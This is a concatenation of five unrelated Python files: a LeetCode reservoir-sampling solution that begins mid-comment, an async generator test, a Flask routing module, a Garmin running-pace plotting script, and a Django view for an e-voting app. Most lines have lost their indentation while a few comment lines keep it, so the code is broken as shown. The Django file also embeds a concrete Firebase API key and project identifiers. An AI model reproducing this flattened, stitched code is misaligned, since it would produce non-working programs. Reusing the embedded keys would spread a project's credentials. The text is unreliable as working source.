# won't know the number N beforehand. The data comes like a stream, you process
# it as you see it.
#
# Reservoir Sampling:
# Suppose we have a stream a, b, c, d, e, f.
# As we see a, we record it as the POTENTIAL answer with probability 1/1.
# As we then see b, we record b with probability 1/2, which leaves a as the
# record with probability 1/2 as well. THE PROBABILITY IS EQUAL FOR ALL
# ELEMENTS WE HAVE SEEN SO FAR.
# Then we see c and record it with probability 1/3. The probability that a
# stays on the record becomes 2/3 * 1/2 = 1/3; similarly, for b it is also 1/3.
# Probabilities are still equal!
#
# For the mth element, we want a 1/m probability to set it as a record. Then
# the prob for any of the previous elements would be (m-1)/m*1/(m-1) = 1/m.
# It goes like this till the end of the linked list.
from random import randint
class Solution:
def __init__(self, head: ListNode):
"""
@param head The linked list's head.
Note that the head is guaranteed to be not null, so it contains at least one node.
"""
self.head = head
def getRandom(self) -> int:
"""
Returns a random node's value.
"""
cur = self.head
m = 0
ans = 0
while cur:
rnd = randint(0, m)
if rnd == 0:
ans = cur.val
cur = cur.next
m += 1
return ans
# Your Solution object will be instantiated and called as such:
# obj = Solution(head)
# param_1 = obj.getRandom()
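#
# A rough local sanity check (not part of the LeetCode harness; assumes a
# ListNode with .val and .next): sampling many times should give each node a
# roughly equal share, which is exactly the reservoir-sampling guarantee.
#
# head = ListNode(1, ListNode(2, ListNode(3)))
# picker = Solution(head)
# counts = {}
# for _ in range(30000):
#     v = picker.getRandom()
#     counts[v] = counts.get(v, 0) + 1
# print(counts)  # each value should appear roughly 10000 times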
|
from .inlined_async import Async
def add(x, y):
return x+y
def test():
r = yield Async(add, (2, 3))
print(r)
    r = yield Async(add, ('you', 'm3sh'))  # a proper two-element tuple; add() concatenates the strings
print(r)
for n in range(10):
r = yield Async(add, (n, n))
print(r)
# My work done now deploy it Manish
print('Goodbye')
|
"""
=============
Маршрутизация
=============
Модуль routing отвечает за маршрутизацию запросов от пользователя в приложении.
Маршруты разбиты на файлы по функциям:
fakeDataRoutes - генерация фейковых данных
plansRoutes - работа с планами
profileRoutes - работа с профилями
registrationRoutes - авторизация и регистрация пользователей
reportRoutes - работа с PDF-отчётам
tokenRoutes - выдача токенов
userListRoutes - работа со списком пользователей
"""
from flask import render_template
from flask_login import login_required
from app import app
# noinspection PyUnresolvedReferences
from app.routing import fakeDataRoutes, plansRoutes, profileRoutes, registrationRoutes, reportRoutes, userListRoutes,\
tokenRoutes
from app.api.users import get_current_profile
from app.routing.userTypeDecorators import admin_required
# Home page
@app.route('/')
@app.route('/index')
@app.route('/tpindex')
@login_required
def index():
return render_template('index.html', title='Главная', user=get_current_profile())
# Logs
@app.route('/logs')
@login_required
@admin_required
def logs():
return render_template('logs.html', title='Логи', user=get_current_profile())
|
#!/usr/bin/env python3
# This program plots a three dimensional graph representing a runner's
# performance vs time and length of run. Input is an activity file downloaded
# from connect.garmin.com.
# FIXME: Runs.load() excludes runs whose distance and pace fall outside
# a given range. See "Exclude outliers" comment below. These limits should
# probably be command-line arguments that override defaults.
from mpl_toolkits import mplot3d
import numpy as np
import matplotlib.pyplot as plt
from matplotlib import cm
#from matplotlib.ticker import LinearLocator, FormatStrFormatter
import argparse
import datetime
from datetime import date
#============================================================================
# Globals
version = 4
#Input file field index values.
TYPE = 0
TIME_STAMP = 1
DISTANCE = 4
TIME = 6
#============================================================================
# Classes
# A class to hold a run event.
class Event:
def __init__(self, _timeStamp, _distance, _pace):
self.timeStamp = _timeStamp # date.
self.day = 0 # Day count from first run.
self.distance = _distance # In miles.
self.pace = _pace # In minutes per mile.
# A class to hold all the runs.
class Runs:
def __init__(self):
self.inputEvents = np.array([], dtype = Event)
self.day = []
self.distance = []
self.pace = []
def length(self):
return len(self.inputEvents)
# For each run in the file at path, load date, distance and pace. Pace is
# computed from distance and time.
def load(self, path):
values = []
self.__init__()
with open(path) as inputFile:
# Skip the header line.
inputFile.readline()
for line in inputFile:
text = self.removeQuotesAndCommas(line)
values = text.split(',')
# Load only running events.
if values[TYPE] == 'Running':
# From values, get date, distance in miles.
runDate = date.fromisoformat(values[TIME_STAMP].split()[0])
runDistance = float(values[DISTANCE])
# To get run pace, first convert time (hh:mm:ss) to minutes, then
# compute pace (minutes/mile).
h, m, s = values[TIME].split(':')
t = 60.0 * float(h) + float(m) + (float(s) / 60.0)
runPace = t / runDistance
# Exclude outliers.
if runDistance >= 2.0 and runDistance <= 27.0 \
and runPace > 4.0 and runPace < 20.0:
self.inputEvents = np.append(self.inputEvents, \
Event(runDate, runDistance, runPace))
        # Compute the day numbers.
firstDay = self.inputEvents[len(self.inputEvents) - 1].timeStamp
for event in self.inputEvents:
event.day = (event.timeStamp - firstDay).days
def fitPlane(self):
# Create the arrays needed for the fit.
self.day = []
self.distance = []
self.pace = []
for event in self.inputEvents:
            self.day.append(event.day)
            self.distance.append(event.distance)
            self.pace.append(event.pace)
tmp_A = []
tmp_b = []
for i in range(len(self.day)):
tmp_A.append([self.day[i], self.distance[i], 1])
tmp_b.append(self.pace[i])
b = np.matrix(tmp_b).T
A = np.matrix(tmp_A)
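        # Ordinary least-squares plane fit via the normal equations:
        #     fit = (A^T A)^-1 A^T b
        # where each row of A is [day, distance, 1] and b holds the observed paces,
        # so the fitted model is pace ~ fit[0]*day + fit[1]*distance + fit[2].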
self.fit = (A.T * A).I * A.T *b
errors = b - A * self.fit
residual = np.linalg.norm(errors)
print("solution:")
print(" %f x + %f y + %f = z" %(self.fit[0], self.fit[1], self.fit[2]))
# print("errors:")
# print(" ", errors)
print("residual:")
print(" ", residual)
def plot(self):
fig = plt.figure()
ax = plt.subplot(111, projection = '3d')
ax.scatter(self.day, self.distance, self.pace, color = 'b')
xlim = ax.get_xlim()
ylim = ax.get_ylim()
X, Y = np.meshgrid(np.arange(xlim[0], xlim[1]), \
np.arange(ylim[0], ylim[1]))
Z = np.zeros(X.shape)
for r in range(X.shape[0]):
for c in range(X.shape[1]):
Z[r,c] = self.fit[0] * X[r,c] + self.fit[1] * Y[r,c] + self.fit[2]
ax.plot_wireframe(X, Y, Z, color = 'y')
ax.set_xlabel('Days since ' + \
self.inputEvents[len(self.inputEvents)-1].timeStamp.strftime("%m-%d-%Y"))
ax.set_ylabel('Distance - miles')
ax.set_zlabel('Pace - min/mile')
plt.show()
# Remove commas embedded in quoted strings. Remove quotes from strings.
# Return the modified string.
def removeQuotesAndCommas(self, inputText):
inQuotes = False
outputText = ''
for c in inputText:
if inQuotes:
if c == '"':
inQuotes = False
elif c != ',':
outputText += c
else:
if c == '"':
inQuotes = True
else:
outputText += c
return outputText
#============================================================================
# Functions
def displayVersion():
print("runsPlot version " + str(version))
quit()
#============================================================================
# Main program
parser = argparse.ArgumentParser(description = \
"Plot pace vs time and length of run")
parser.add_argument('inputFile', type = str, help = 'Input file path')
parser.add_argument('-v', '--version', action = 'store_true', \
help = 'Display version and quit')
args = parser.parse_args()
if args.version:
displayVersion()
runs = Runs()
runs.load(args.inputFile)
print("Total number of runs = ", runs.length())
runs.fitPlane()
runs.plot()
|
from django.shortcuts import render
import pyrebase
# Create your views here.
firebaseConfig = {
"apiKey": "AIzaSyDEwWVDdZlXARcUrLvgEfn-goXpgpKf1nU",
"authDomain": "e-voting-f8fd3.firebaseapp.com",
"databaseURL": "https://e-voting-f8fd3-default-rtdb.asia-southeast1.firebasedatabase.app",
"projectId": "e-voting-f8fd3",
"storageBucket": "e-voting-f8fd3.appspot.com",
"messagingSenderId": "799413315988",
"appId": "1:799413315988:web:c164bfd3355d96cd9c4781",
"measurementId": "G-P2ECTV2C5Q"
}
firebase = pyrebase.initialize_app(firebaseConfig)
auth = firebase.auth()
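# `auth` is pyrebase's authentication client; the render-only views below would
# typically hand submitted credentials to helpers such as
# auth.sign_in_with_email_and_password / auth.create_user_with_email_and_password.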
def SignIn(request):
return render(request,"signin.html")
def SignUp(request):
return render(request, "signup.html")
def Authenticate(request):
return render(request, "auth.html")
|